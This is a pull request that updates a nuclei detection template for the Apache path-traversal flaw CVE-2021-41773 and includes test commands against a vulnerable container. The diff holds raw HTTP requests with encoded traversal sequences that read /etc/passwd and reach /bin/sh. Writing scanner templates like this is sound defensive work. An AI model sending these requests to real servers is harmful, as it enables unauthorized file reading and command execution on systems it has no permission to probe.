### PR TITLE
Update CVE-2021-41773.yaml

### DIFF
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@@ -33,6 +33,10 @@ requests:
         Host: {{Hostname}}
 
       - |
+        GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
         POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded


### PR DESCRIPTION
The  CVE-2021-41773 detection file was not detecting correctly the vulnerability. For example if we tried with [this container](https://github.com/noflowpls/CVE-2021-41773), no CVE detected with nuclei on the "no-cgid" version.

With this fix we can detect the vulnerability using :

```bash
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
nuclei -u 'http://localhost:8080' -t ~/nuclei-templates/cves/2021/CVE-2021-41773.yaml
```

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Updated CVE-2021-41773

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO
